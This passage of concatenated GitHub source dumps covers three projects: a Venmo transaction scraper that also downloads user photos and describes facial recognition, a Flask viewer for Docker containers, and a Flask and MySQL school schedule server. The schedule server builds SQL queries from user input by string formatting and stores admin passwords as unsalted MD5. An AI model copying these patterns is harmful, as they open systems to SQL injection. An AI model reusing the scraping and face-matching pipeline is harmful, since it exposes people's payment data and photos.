actor_transactions['message_cleaned']\n\ntext_doc.tolist()\n\ndictionary = corpora.Dictionary(text_doc)\n\n# Converting list of documents (corpus) into Document Term Matrix using dictionary prepared above.\ndoc_term_matrix = [dictionary.doc2bow(doc) for doc in text_doc]\n\n# Creating the object for LDA model using gensim library\nLda = gensim.models.ldamodel.LdaModel\n\n# Running and Trainign LDA model on the document term matrix\nldamodel = Lda(doc_term_matrix, num_topics=3, id2word = dictionary, passes=50)\n\nprint(ldamodel.print_topics(num_topics=3, num_words=3))" }, { "alpha_fraction": 0.6043405532836914, "alphanum_fraction": 0.6332777142524719, "avg_line_length": 28.47541046142578, "blob_id": "c9d9124aaf0e59c2545356e912c9d1586da8120e", "content_id": "0b24a13cb8cf800536cd3bd067b1837d51719d3b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1797, "license_type": "no_license", "max_line_length": 124, "num_lines": 61, "path": "/Scrape.py", "repo_name": "adam-lim1/venmo-analysis", "src_encoding": "UTF-8", "text": "# ************************** Initialization **************************\n\nfrom lxml import html\nimport requests\nimport pandas as pd\nimport pandas.io.sql as psql\nimport pickle\nfrom pandas.io.json import json_normalize\nimport time\n\n## FUNCTION FOR CONVERTING PAGE TO 
DATAFRAME\ndef get_data(json_object):\n \n final_arr = pd.DataFrame()\n for element_num in range(0,len(json_object['data'])):\n my_arr1 = json_normalize(json_object['data'][element_num])\n my_arr2 = json_normalize(json_object['data'][element_num]['transactions'])\n all_cols = pd.concat([my_arr1, my_arr2], axis=1)\n\n if element_num == 0:\n final_arr = all_cols\n else:\n final_arr = final_arr.append(all_cols)\n \n return final_arr\n\nbase_path = 'C:/Users/290002943/Documents/Personal/Venmo Project'\n\n# ************************** Scrape Venmo API **************************\n\n# Define start and end time for scrape vintage\nstart_unix = 1507584459\nend_unix = 1507586529\n\nmy_start = start_unix\nmy_end = start_unix+60\n\n# Step through scrape in minute increments due to number of transaction limitions\nwhile my_start < end_unix:\n page = requests.get('https://venmo.com/api/v5/public?since{}&until={}&limit=1000000'.format(str(my_start), str(my_end)))\n tree = html.fromstring(page.content)\n venmo_trans = get_data(page.json())\n print(\"{} done\".format(my_start))\n \n if (my_start == start_unix):\n all_trans = venmo_trans\n else:\n all_trans = all_trans.append(venmo_trans)\n \n my_start = my_start+60\n my_end = my_end+60\n time.sleep(20)\n\n\nvenmo_trans = all_trans\n\n# Reset index on df\nvenmo_trans = venmo_trans.reset_index(drop=True)\n\n# write df to file\nvenmo_trans.to_pickle('{}/Data/venmo_trans.pkl'.format(base_path), compression='infer')" }, { "alpha_fraction": 0.6325783729553223, "alphanum_fraction": 0.6376306414604187, "avg_line_length": 33.36526870727539, "blob_id": "274088edd71b8c12ee48d5c6ccb007b155696c73", "content_id": "e1e65468b9ac6c76fe677cf2fb7b7a6ee35fb394", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5740, "license_type": "no_license", "max_line_length": 151, "num_lines": 167, "path": "/CleanVenmoData.py", "repo_name": "adam-lim1/venmo-analysis", "src_encoding": "UTF-8", "text": "# ************************** Initialization **************************\n\nimport pandas as pd\nimport pickle\nimport time\n\n# Text cleaning packages\nimport emoji\nimport unicodedata as uni\nfrom unidecode import unidecode\nimport re\nfrom nltk.corpus import stopwords # had to use nltk.download('stopwords') to download stopwords\nfrom nltk.stem import WordNetLemmatizer\nimport string\nfrom bs4 import BeautifulSoup\nfrom codes import codes # emoji codes py file\n\n# Packages for downloading images\nimport urllib\n\n# Define list of stop words, punctuation to remove\nstopWords = set(stopwords.words('english'))\nexclude = set(string.punctuation)\n\n## FUNCTION FIND EMOJIS IN TEXT\ndef extract_emojis(str):\n return ''.join(c for c in str if c in emoji.UNICODE_EMOJI)\n\ndef remove_punctuation(s):\n s = ''.join([i for i in s if i not in exclude])\n return s\n\nclass Emoji:\n def __init__(self, const):\n if len(const) == 1:\n self.__fromUnicode(const)\n elif const[0] == \":\":\n self.__fromAlias(const)\n else:\n self.__fromEscape(const)\n self.aliases = codes[self.escape]\n self.alias = self.aliases[0]\n self.char = bytes(\"\\\\u\"+self.escape, \"ascii\").decode(\"unicode-escape\")[0]\n self.is_supported = hex(ord(self.char))[2:] == self.escape\n\n def __fromUnicode(self, char):\n escape = hex(ord(char))[2:]\n if escape in codes:\n self.escape = escape\n else:\n raise ValueError\n\n def __fromAlias(self, alias):\n for k, v in codes.items():\n if alias in v:\n self.escape = k\n break\n else:\n raise ValueError\n\n def __fromEscape(self, 
escape):\n if escape in codes.keys():\n self.escape = escape\n else:\n raise ValueError\n\ndef replaceAliases(text, trailingSpaces=0, force=False):\n \"\"\" Replaces all supported emoji-cheat-sheet aliases in a text with the corresponding emoji. \"\"\"\n def replAlias(m):\n alias = \":\"+m.group(1)+\":\"\n if not Emoji(alias).is_supported and not force:\n return alias\n try:\n return Emoji(alias).char + trailingSpaces * \" \"\n except ValueError:\n return alias\n return re.sub(\":([^s:]?[\\w-]+):\", replAlias, text)\n\ndef replaceEmoji(text, trailingSpaces=0):\n \"\"\" Replaces all emojis with their primary emoji-cheat-sheet alias. \"\"\"\n i = 0\n while i < len(text):\n escape = hex(ord(text[i]))[2:]\n if escape in codes.keys():\n text = text.replace(text[i] + trailingSpaces*\" \", Emoji(escape).alias)\n i += len(Emoji(escape).alias)\n else:\n i += 1\n return text\n\nbase_path = 'C:/Users/290002943/Documents/Personal/Venmo Project'\n\n\n# ************************** Clean Data **************************\n\n\n# Read in dataframe\nvenmo_trans = pickle.load(open( '{}/Data/venmo_trans.pkl'.format(base_path), \"rb\" ) )\n\n# Remove punctuation\nvenmo_trans['message_no_punc'] = venmo_trans['message'].apply(remove_punctuation)\n\n# Remove stop words\nvenmo_trans['message_no_stop'] = venmo_trans['message_no_punc'].apply(lambda x: [item for item in x.split() if item not in stopWords])\n\n# Stem words\nwordnet_lemmatizer = WordNetLemmatizer()\nvenmo_trans['message_stemmed'] = venmo_trans['message_no_stop'].apply(lambda msg_list: [wordnet_lemmatizer.lemmatize(element) for element in msg_list])\n\n# Remove emojis\nvenmo_trans['emoji_replaced'] = venmo_trans['message_stemmed'].apply(lambda msg_list: [replaceEmoji(word).replace(\"::\", \": :\") for word in msg_list])\n\nvenmo_trans['message_lol'] = venmo_trans['emoji_replaced'].apply(lambda msg_list: [element.split() for element in msg_list])\n\nvenmo_trans['message_cleaned']= venmo_trans['message_lol'].apply(lambda msg_list: [val for sublist in msg_list for val in sublist])\n\n\n# Create subset df with columns we are interested in\ntrans_subset = venmo_trans[['actor.username', \n 'actor.picture', \n 'created_time',\n 'message',\n 'message_cleaned',\n 'story_id', \n 'target.username', \n 'target.picture', \n 'type']]\n\n\ntrans_cols = ['actor_username', 'actor_picture', 'created_time', 'message', 'message_cleaned','story_id', 'target_username', 'target_picture', 'type']\ntrans_subset.columns = trans_cols\n\n# Write trans subset to pickle\ntrans_subset.to_pickle('{}/Data/trans_subset.pkl'.format(base_path), compression='infer')\n\n# ************************** Get User Pictures **************************\n\n# Get Actors\nactor_pics_df = trans_subset[['actor_username', 'actor_picture']]\nactor_pics_df = actor_pics_df.rename(columns={'actor_username':'username', 'actor_picture':'picture'})\n\n# Get Targets\ntarget_pics_df = trans_subset[['target_username', 'target_picture']]\ntarget_pics_df = target_pics_df.rename(columns={'target_username':'username', 'target_picture':'picture'})\n\n# Combine and drop duplicates\nall_user_pics_df = actor_pics_df.append(target_pics_df)\nall_user_pics_df.drop_duplicates(inplace=True)\nall_user_pics_df.reset_index(inplace=True, drop=True)\n\nall_user_pics_df = all_user_pics_df.sort_values('username')\n\n# Drop users that have no picture\nall_user_pics_df = all_user_pics_df[all_user_pics_df['picture'] != 'https://s3.amazonaws.com/venmo/no-image.gif']\n\n# Write users to 
pickle\nall_user_pics_df.to_pickle('{}/Data/all_user_pics_df.pkl'.format(base_path), compression='infer')\n\n# Open and download all pics\nfor i in range(0,all_user_pics_df.shape[0]):\n try:\n urllib.request.urlretrieve(all_user_pics_df['picture'][i], \n '{}/Images/{}.jpg'.format(base_path, all_user_pics_df['username'][i]))\n if i%10 == 0:\n print(i,'/', all_user_pics_df.shape[0], 'done')\n except:\n print(\"Couldn't find picture\")\n\n" }, { "alpha_fraction": 0.7970401644706726, "alphanum_fraction": 0.7970401644706726, "avg_line_length": 51.55555725097656, "blob_id": "78dd82307be45fed4afb61552474eb3f41585e72", "content_id": "c89e88a1fdd793ceb7cd042021341aac51701834", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 473, "license_type": "no_license", "max_line_length": 121, "num_lines": 9, "path": "/README.md", "repo_name": "adam-lim1/venmo-analysis", "src_encoding": "UTF-8", "text": "# venmo-analysis\n\nGain insight into a Venmo user's spending behavior via LDA topic modeling.\n\nComponents:\n- Scrape.py - Scrape Venmo API for transaction information\n- CleanVenmoData.py - Preprocess scraped data (remove stop words, stem, words, translate emojis, get user pictures)\n- FacialRecognition.py - Set up AWS collection for facial recognition\n- Query.py - Capture webcam image of user and use to query database for transactions; get insights from user transactions\n" } ]
5
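The venmo-analysis README above ends with Query.py running LDA topic modeling over a user's transaction messages. A self-contained sketch of that gensim step, assuming gensim is installed; the three tokenized messages are invented placeholders standing in for the record's 'message_cleaned' column:

from gensim import corpora
from gensim.models.ldamodel import LdaModel

docs = [["pizza", "dinner", "friday"], ["rent", "october"], ["pizza", "lunch", "friday"]]
dictionary = corpora.Dictionary(docs)               # word <-> id mapping
corpus = [dictionary.doc2bow(doc) for doc in docs]  # one bag-of-words per message
# Mirrors Query.py's Lda(doc_term_matrix, num_topics=3, id2word=dictionary, passes=50).
lda = LdaModel(corpus, num_topics=2, id2word=dictionary, passes=10)
print(lda.print_topics(num_topics=2, num_words=3))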
FalconJK/DgxInfo
https://github.com/FalconJK/DgxInfo
afd914c522bcbc57bd873f84621b201c3cacbb1b
3fda2bf9c7a1a0d97b930c5e8a14bc1e4e7bd8b1
a30bd05874571c636ecbca0ee027624761492bcb
refs/heads/main
2023-02-07T19:59:51.346362
2020-12-24T12:33:24
2020-12-24T12:33:24
324,151,556
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.646789014339447, "alphanum_fraction": 0.71100914478302, "avg_line_length": 42.599998474121094, "blob_id": "5a1d59c6c0ca24dd450b6809c92d1cc3095f53dd", "content_id": "759849b2e695c1ecc81ef8f69410eeb59cd3c2e8", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 218, "license_type": "permissive", "max_line_length": 124, "num_lines": 5, "path": "/rebuild.sh", "repo_name": "FalconJK/DgxInfo", "src_encoding": "UTF-8", "text": "#! /bin/bash\ndocker rm -f dgxinfo\ndocker rmi dgxinfo:v1.0.0\ndocker build -t dgxinfo:v1.0.0 .\ndocker run -it --restart=always --cpus=2 --name dgxinfo -v /var/run/docker.sock:/var/run/docker.sock -p 81:80 dgxinfo:v1.0.0\n" }, { "alpha_fraction": 0.8421052694320679, "alphanum_fraction": 0.8421052694320679, "avg_line_length": 18, "blob_id": "ad3fa8b3e75229b4e35f2e9ddc2f8f0cffaecb78", "content_id": "7c154c4c89cbfba39991bc1bc9b8d255fbdcee4b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 38, "license_type": "permissive", "max_line_length": 21, "num_lines": 2, "path": "/start.sh", "repo_name": "FalconJK/DgxInfo", "src_encoding": "UTF-8", "text": "service nginx restart\nuwsgi uwsgi.ini\n" }, { "alpha_fraction": 0.7162162065505981, "alphanum_fraction": 0.7364864945411682, "avg_line_length": 17.5, "blob_id": "ab5df0af09acbc436323f5b85477570a656b35ed", "content_id": "99d1dbdf4e166850531da4b233957a0984accdb1", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 148, "license_type": "permissive", "max_line_length": 25, "num_lines": 8, "path": "/uwsgi.ini", "repo_name": "FalconJK/DgxInfo", "src_encoding": "UTF-8", "text": "[uwsgi]\nwsgi-file = app.py\nsingle-interpreter = true\nenable-threads = true\nmaster = true\ncallable = app\nsocket = /tmp/flask.sock\nchmod-socket = 666\n" }, { "alpha_fraction": 0.5619946122169495, "alphanum_fraction": 0.5717654824256897, "avg_line_length": 36.099998474121094, "blob_id": "3bfbf7ce394fd5ddefa1b1f154561527a5e654bd", "content_id": "052e7956b5d8162e72feae517c2095519e8156c9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2968, "license_type": "permissive", "max_line_length": 116, "num_lines": 80, "path": "/app.py", "repo_name": "FalconJK/DgxInfo", "src_encoding": "UTF-8", "text": "import time\n\nimport requests\nfrom docker import Client\nfrom flask import Flask, jsonify, render_template\nfrom flask_limiter import Limiter\nfrom flask_limiter.util import get_remote_address\n\napp = Flask(__name__)\nlimiter = Limiter(\n app,\n key_func=get_remote_address,\n default_limits=[\"200 per day\", \"50 per hour\"]\n)\n\n\ndef ip():\n return requests.get('http://ifconfig.me/ip').text.strip()\n\n\[email protected](\"200 per hour\")\[email protected]('/json')\ndef json(name=None):\n start = time.time()\n host = Client(base_url='unix://var/run/docker.sock')\n print('\\nprocess time:', time.time() - start, '\\n')\n return jsonify(host.containers(all=True))\n\n\[email protected](\"200 per hour\")\[email protected]('/<name>')\ndef template(name=None):\n start = time.time()\n host = Client(base_url='unix://var/run/docker.sock')\n host_containers = host.containers(all=True)\n all_containers = [container['Names'][0].replace('/', '') for container in host_containers]\n all_user_containers = [container for container in all_containers if '_' in container]\n # 
-----------------------------------------------------------------------------------------------\n user_list = set([container.split('_')[0] for container in all_user_containers])\n if name in user_list:\n specific_user_containers = [container for container in all_containers if name in container]\n else:\n specific_user_containers = list()\n # -----------------------------------------------------------------------------------------------\n names = [container.pop('Names')[0].replace('/', '') for container in host_containers]\n api = dict(zip(names, host_containers))\n new_api = api.copy()\n for container_name in api:\n if container_name not in specific_user_containers:\n del new_api[container_name]\n del api, all_user_containers, specific_user_containers, all_containers\n\n for container, data in new_api.items():\n context = list()\n ports = sorted(data['Ports'], key=lambda p: p['PrivatePort'])\n\n for port in ports:\n private_port = port.get('PrivatePort')\n public_port = port.get('PublicPort')\n public = ''\n if port.get('IP') != None:\n public = f\"{port['IP']}:{public_port}->\"\n private = f\"{port['Type']}/{private_port}, \"\n NAT = public + private\n if private_port != 8888 and private_port != 6080:\n context.append(NAT)\n else:\n new_api[container]['jupyter_link'] = f'http://{ip()}:{public_port}'\n new_api[container]['jupyter_text'] = NAT[:-2]\n\n new_api[container]['Ports'] = ''.join(context)\n running = 0\n for i in new_api:\n if new_api[i]['State'] == 'running':\n running += 1\n return render_template('index.html', name=name, running=running, total=len(new_api), containers=new_api.items())\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0')\n" }, { "alpha_fraction": 0.6897233128547668, "alphanum_fraction": 0.695652186870575, "avg_line_length": 25.63157844543457, "blob_id": "694db2f2e19e06446dbc8f3fe93261fef426fef1", "content_id": "1bf26546815faef9e656187cb2a190dae2f94c97", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Dockerfile", "length_bytes": 506, "license_type": "permissive", "max_line_length": 79, "num_lines": 19, "path": "/Dockerfile", "repo_name": "FalconJK/DgxInfo", "src_encoding": "UTF-8", "text": "FROM python:3.6.9-stretch\n\n# Set the working directory to /app\nWORKDIR /flask\n\n# Copy the current directory contents into the container at /app \nADD . 
/flask\n\n# Install the dependencies\nRUN pip install -r requirements.txt && \\\n apt update && \\\n apt install nginx -y &&\\\n cp flaskconfig /etc/nginx/sites-available/ && \\\n ln -s /etc/nginx/sites-available/flaskconfig /etc/nginx/sites-enabled/ && \\\n rm /etc/nginx/sites-enabled/default\n\n\n# run the command to start uWSGI\nCMD [\"sh\", \"start.sh\"]\n" }, { "alpha_fraction": 0.5360824465751648, "alphanum_fraction": 0.7010309100151062, "avg_line_length": 15.166666984558105, "blob_id": "7cd145ab7a6ccb206903e212945ad1fb2e5e0a9e", "content_id": "8857eeb15f4d339ed01bc19bc890a0bb4a3b3f79", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 97, "license_type": "permissive", "max_line_length": 20, "num_lines": 6, "path": "/requirements.txt", "repo_name": "FalconJK/DgxInfo", "src_encoding": "UTF-8", "text": "docker-py==1.10.6\nFlask==1.1.2\nFlask-Cache==0.13.1\nFlask-Caching==1.9.0\nFlask-Limiter==1.4\nuwsgi\n" }, { "alpha_fraction": 0.6616161465644836, "alphanum_fraction": 0.6944444179534912, "avg_line_length": 21.05555534362793, "blob_id": "b7ecd0507acf539e89658ade898780897a3a1566", "content_id": "25bd3ad8571098006ba8933ac069b545130a4dcb", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 396, "license_type": "permissive", "max_line_length": 129, "num_lines": 18, "path": "/README.md", "repo_name": "FalconJK/DgxInfo", "src_encoding": "UTF-8", "text": "# DgxInfo\nUser's Docker container information\n\nhttps://hub.docker.com/r/falconjk/dgxinfo\n\n![](https://i.imgur.com/UZgCNUR.png)\n## Used\n* docker-py \n* Flask\n* uWSGI\n* NGINX\n\n## docker run command\n`docker run -idt --restart=always --cpus=2 --name dgxinfo -v /var/run/docker.sock:/var/run/docker.sock -p 80:80 falconjk/dgxinfo`\n\n## Connect \n* http://{ip}/{username}\n* example: http://192.168.0.2/bob" } ]
7
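app.py in the FalconJK/DgxInfo record above also exposes a rate-limited /json route that returns the raw docker-py containers(all=True) payload. A small standard-library sketch of reading it, assuming the service is reachable at the README's example address 192.168.0.2 (an illustrative IP, not a live host):

import json
import urllib.request

# /json is limited to 200 requests per hour by Flask-Limiter (see app.py above).
with urllib.request.urlopen("http://192.168.0.2/json") as resp:
    containers = json.load(resp)
for c in containers:
    # 'Names' and 'State' are the same fields app.py reads when rendering index.html.
    print(c["Names"][0].lstrip("/"), c["State"])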
FroHenK/PTLScheduleServer
https://github.com/FroHenK/PTLScheduleServer
7dd2bbe727564e094a07e1143f3d1eec1e53ef3a
e7dc55fc72926ffc8c6514464fe82a11f4922253
3ab7d387f3ff1b59314aa42b968d5f81ebaa685c
refs/heads/master
2016-08-12T23:06:15.568629
2015-12-16T07:16:15
2015-12-16T07:16:15
47,759,559
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6256204843521118, "alphanum_fraction": 0.6326661109924316, "avg_line_length": 29.169082641601562, "blob_id": "e60209d928a07831c11af532677d0f5ed3898454", "content_id": "d35768b8f3ad13e8298cefce6a567b2a807c4edf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6245, "license_type": "no_license", "max_line_length": 132, "num_lines": 207, "path": "/mysqlclient.py", "repo_name": "FroHenK/PTLScheduleServer", "src_encoding": "UTF-8", "text": "__author__ = 'Alexey Maksimov (FroHenK)'\nimport os\nimport mysql\nfrom datetime import datetime\nfrom mysql.connector import (connection)\n\n\nclass Grade:\n def __init__(self, id, title):\n self.title = title\n self.id = id\n\n\nclass DayElement:\n def __init__(self, id, grade_id, date, subject_id, subject_name):\n self.subject_name = subject_name\n self.subject_id = subject_id\n self.date = date\n self.grade_id = grade_id\n self.id = id\n\n\nclass Homework:\n def __init__(self, id, grade_id, subject_id, data):\n self.subject_id = subject_id\n self.grade_id = grade_id\n self.data = data\n self.id = id\n\n\nclass Subject:\n def __init__(self, id, title):\n self.title = title\n self.id = id\n\n\nMYSQL_HOST = os.environ.get('OPENSHIFT_MYSQL_DB_HOST', '127.0.0.1')\nMYSQL_USER = os.environ.get('OPENSHIFT_MYSQL_DB_USERNAME', 'root')\nMYSQL_PASSWORD = os.environ.get('OPENSHIFT_MYSQL_DB_PASSWORD', '')\nMYSQL_PORT = os.environ.get('OPENSHIFT_MYSQL_DB_PORT', 3306)\nMYSQL_DB = 'ptl'\n\ncnx = connection.MySQLConnection(user=MYSQL_USER, password=MYSQL_PASSWORD,\n host=MYSQL_HOST,\n database=MYSQL_DB, charset='utf8')\n\ncurs = cnx.cursor(buffered=True)\n\n\ndef get_all_grades(): # Get grades from DB\n curs.execute('SELECT * FROM grade')\n res = curs.fetchall()\n\n grades_array = []\n for (id, title) in res:\n grades_array.append(Grade(int(id), str(title.decode(\"utf8\"))))\n return grades_array\n\n\ndef get_homeworks(grade_id2, subject_id2): # get homeworks by grade and subject\n id_ = 'SELECT * FROM homework WHERE grade_id=%s AND subject_id=%s ORDER BY id DESC' % (grade_id2, subject_id2)\n\n curs.execute(id_)\n\n res = curs.fetchall()\n\n homeworks_array = []\n for (id, grade_id, subject_id, data) in res:\n homeworks_array.append(Homework(int(id), grade_id, subject_id, str(data.decode(\"utf8\"))))\n return homeworks_array\n\n\ndef get_all_homeworks(): # get all homeworks\n id_ = 'SELECT * FROM homework'\n\n curs.execute(id_)\n\n res = curs.fetchall()\n\n homeworks_array = []\n for (id, grade_id, subject_id, data) in res:\n homeworks_array.append(Homework(int(id), grade_id, subject_id, str(data.decode(\"utf8\"))))\n return homeworks_array\n\n\ndef create_day_element_db(grade_id, datetime, subject_id): # create day element\n insert_command = 'INSERT INTO day_element (grade_id, date, subject_id) VALUES (%s,\\'%s\\',%s)' % (\n grade_id, datetime.strftime('%Y-%m-%d %H:%M:00'), subject_id)\n curs.execute(insert_command)\n cnx.commit()\n\n\ndef is_valid_admin(username, password_md5): # is there admin with those login/pass\n id_ = 'SELECT * FROM admins WHERE username=\\'%s\\' AND password=\\'%s\\'' % (username, password_md5)\n curs.execute(id_)\n if not curs.fetchone():\n return False\n return True\n\n\ndef add_homework_db(grade_id, subject_id, data): # create and add homework to DB\n insert_command = 'INSERT INTO homework (grade_id, subject_id, data) VALUES (%s,%s,\\'%s\\')' % (\n grade_id, subject_id, data)\n curs.execute(insert_command)\n cnx.commit()\n\n\ndef add_grade_db(title): # create and 
add homework to DB\n insert_command = 'INSERT INTO grade (title) VALUES (\\'%s\\')' % title\n curs.execute(insert_command)\n cnx.commit()\n\n\n\ndef add_subject_db(title): # create and add homework to DB\n insert_command = 'INSERT INTO subject (title) VALUES (\\'%s\\')' % (title)\n curs.execute(insert_command)\n cnx.commit()\n\n\ndef get_day_db(grade_id, date): # get day elements by grade and date\n elements_array = []\n command = 'SELECT * FROM day_element WHERE grade_id = %s AND date BETWEEN \\'%s 00:00:00\\' AND \\'%s 23:59:59\\' ORDER BY date' % (\n grade_id, date.strftime('%Y-%m-%d'), date.strftime('%Y-%m-%d'))\n curs.execute(command)\n res = curs.fetchall()\n for (id, grade_id, date, subject_id) in res:\n curs.execute('SELECT title FROM subject WHERE id=%s' % subject_id)\n title = curs.fetchone()[0]\n elements_array.append(DayElement(id, grade_id, date, subject_id, str(title.decode('utf8'))))\n\n return elements_array\n\n\ndef get_all_day_db(): # get all day elements\n elements_array = []\n command = 'SELECT * FROM day_element'\n curs.execute(command)\n res = curs.fetchall()\n for (id, grade_id, date, subject_id) in res:\n curs.execute('SELECT title FROM subject WHERE id=%s' % subject_id)\n title = curs.fetchone()[0]\n elements_array.append(DayElement(id, grade_id, date, subject_id, str(title.decode('utf8'))))\n\n return elements_array\n\n\ndef get_homework_id(id): # get homework by id\n id_ = 'SELECT * FROM homework WHERE id=%s' % (id)\n\n curs.execute(id_)\n\n res = curs.fetchall()\n\n homeworks_array = []\n for (id, grade_id, subject_id, data) in res:\n homeworks_array.append(Homework(int(id), grade_id, subject_id, str(data.decode(\"utf8\"))))\n return homeworks_array[0]\n\n\ndef delete_day_db_id(id): # delete day element by id\n\n command = 'DELETE FROM day_element WHERE id=%s' % id\n\n curs.execute(command)\n cnx.commit()\n\n\ndef delete_subject_id(id): # delete subject by id\n\n command = 'DELETE FROM subject WHERE id=%s' % id\n curs.execute(command)\n cnx.commit()\n\n\ndef delete_homework_id(id): # delete hw by id\n\n command = 'DELETE FROM homework WHERE id=%s' % id\n\n curs.execute(command)\n cnx.commit()\n\n\ndef get_day_db_id(id): # delete day element by id\n elements_array = []\n command = 'SELECT * FROM day_element WHERE id=%s' % id\n curs.execute(command)\n res = curs.fetchall()\n for (id, grade_id, date, subject_id) in res:\n curs.execute('SELECT title FROM subject WHERE id=%s' % subject_id)\n title = curs.fetchone()[0]\n elements_array.append(DayElement(id, grade_id, date, subject_id, str(title.decode('utf8'))))\n\n return elements_array[0]\n\n\ndef get_all_subjects(): # get all subjects\n curs.execute('SELECT * FROM subject')\n res = curs.fetchall()\n subjects_array = []\n for (id, title) in res:\n subjects_array.append(Subject(int(id), str(title.decode(\"utf8\"))))\n return subjects_array\n\n\ndef close_connection(): # not used\n cnx.close()\n" }, { "alpha_fraction": 0.7777777910232544, "alphanum_fraction": 0.7777777910232544, "avg_line_length": 35, "blob_id": "32d7f6cf11e256a852a7decd8f914ab7819f45f0", "content_id": "e7d37eb3a594a72b7296051483b72f805e6d01ce", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 72, "license_type": "no_license", "max_line_length": 39, "num_lines": 2, "path": "/README.md", "repo_name": "FroHenK/PTLScheduleServer", "src_encoding": "UTF-8", "text": "Based on Flask microframework. 
\nLies on http://ptl-frohenk.rhcloud.com/\n" }, { "alpha_fraction": 0.6000000238418579, "alphanum_fraction": 0.6200000047683716, "avg_line_length": 29, "blob_id": "d3cef483e928d242d415536d33b2b477d65623da", "content_id": "ef0376add7c1a779a48ce26984367d6288d69aee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 300, "license_type": "no_license", "max_line_length": 66, "num_lines": 10, "path": "/setup.py", "repo_name": "FroHenK/PTLScheduleServer", "src_encoding": "UTF-8", "text": "from setuptools import setup\n\nsetup(name='FlaskApp',\n version='1.0',\n description='PTL Schedule Flask app',\n author='Alex Maksimov',\n author_email='[email protected]',\n url='http://www.python.org/sigs/distutils-sig/',\n install_requires=['Flask>=0.10.1', 'mysql-connector-python'],\n )\n" }, { "alpha_fraction": 0.656739354133606, "alphanum_fraction": 0.6584280133247375, "avg_line_length": 29.29767417907715, "blob_id": "7c68df9a96fd362bcde474d2e83afb48925d5a86", "content_id": "0ea1a5c19a6284260a6f056cc8a852cb926003bf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6519, "license_type": "no_license", "max_line_length": 120, "num_lines": 215, "path": "/flaskapp.py", "repo_name": "FroHenK/PTLScheduleServer", "src_encoding": "UTF-8", "text": "GUEST_LOCAL = 'Гость'\n__author__ = 'Alexey Maksimov (FroHenK)'\nimport os\nimport hashlib\nimport json\nfrom datetime import datetime, timedelta\n\nfrom mysqlclient import curs, cnx, get_all_grades, get_all_subjects, get_homeworks, is_valid_admin, add_homework_db, \\\n create_day_element_db, get_day_db, get_day_db_id, get_homework_id, delete_day_db_id, delete_homework_id, \\\n get_all_day_db, get_all_homeworks, add_subject_db, delete_subject_id, add_grade_db\n\nfrom flask import Flask, request, session, flash, url_for, redirect, \\\n render_template, abort, send_from_directory\n\napp = Flask(__name__)\n\napp.config.from_pyfile('flaskapp.cfg')\n\n\n# TODO refactor 'class' to 'grade'\n\[email protected]_processor\ndef template_imports(): # put things into table for template rendering\n res = {}\n\n res[\"grades_array\"] = get_all_grades()\n res[\"subjects_array\"] = get_all_subjects()\n res[\"timedelta\"] = timedelta\n return res\n\n\[email protected]('/set_grade/', methods=['POST']) # set user's grade\ndef set_grade():\n session['grade_selected_id'] = int(request.form['grade_id'])\n return redirect('/')\n\n\[email protected]('/logout/')\ndef logout():\n if not session['is_admin']:\n return not_enough_permissions()\n session['is_admin'] = False\n session['username'] = GUEST_LOCAL\n return redirect(url_for('index'))\n\n\[email protected]('/classes/')\ndef classes_admin():\n return render_template('classes_admin.html', classes_admin_active=True)\n\n\[email protected]('/add_grade/', methods=['POST'])\ndef add_grade():\n add_grade_db(request.form['title'])\n return redirect(url_for('classes_admin'))\n\n\[email protected]('/admin/')\ndef admin_panel():\n return render_template('admin_panel.html', admin_panel_active=True)\n\n\[email protected](\"/create_day_element/<string:usr_date>/\", methods=['POST'])\ndef create_day_element(usr_date):\n if not session['is_admin']:\n return not_enough_permissions()\n time_str = request.form['usr_time']\n subject_id = int(request.form['subject_id'])\n if len(time_str) == 0:\n time_str = '00:00'\n current_datetime = datetime.strptime(usr_date + ' ' + time_str, '%Y-%m-%d %H:%M')\n create_day_element_db(session['grade_selected_id'], 
current_datetime, subject_id)\n return redirect('/get_day/' + usr_date + \"/\")\n\n\[email protected]_request\ndef b_request():\n # lazy initializations\n if session.get('grade_selected_id') is None: # if none grade is selected\n session['grade_selected_id'] = 105 # FIXME bad code\n if session.get('is_admin') is None:\n session['is_admin'] = False\n if session.get('username') is None:\n session['username'] = GUEST_LOCAL\n\n\[email protected](\"/get_day/<string:usr_date>/\", methods=['GET'])\ndef get_homework(usr_date):\n current_datetime = datetime.strptime(usr_date, '%Y-%m-%d')\n\n day_db = get_day_db(session['grade_selected_id'], current_datetime)\n return render_template('schedule.html', day_elements_array=day_db, schedule_active=True,\n current_datetime=current_datetime)\n\n\[email protected](\"/delete_day_element/<int:id>\")\ndef delete_day_elem(id):\n if not session['is_admin']:\n return not_enough_permissions()\n day_element = get_day_db_id(id)\n delete_day_db_id(id)\n return redirect('/get_day/' + day_element.date.strftime('%Y-%m-%d'))\n\n\[email protected](\"/delete_homework/<int:id>\")\ndef delete_homework(id):\n if not session['is_admin']:\n return not_enough_permissions()\n day_element = get_homework_id(id)\n delete_homework_id(id)\n return redirect('/subjects/' + str(day_element.subject_id))\n\n\[email protected]('/login/', methods=['POST'])\ndef admin_login():\n s = str(hashlib.md5(str(request.form['password']).encode('utf8')).hexdigest())\n if not is_valid_admin(str(request.form['username']), s):\n return not_enough_permissions() # TODO make special login error page\n session['is_admin'] = True\n session['username'] = 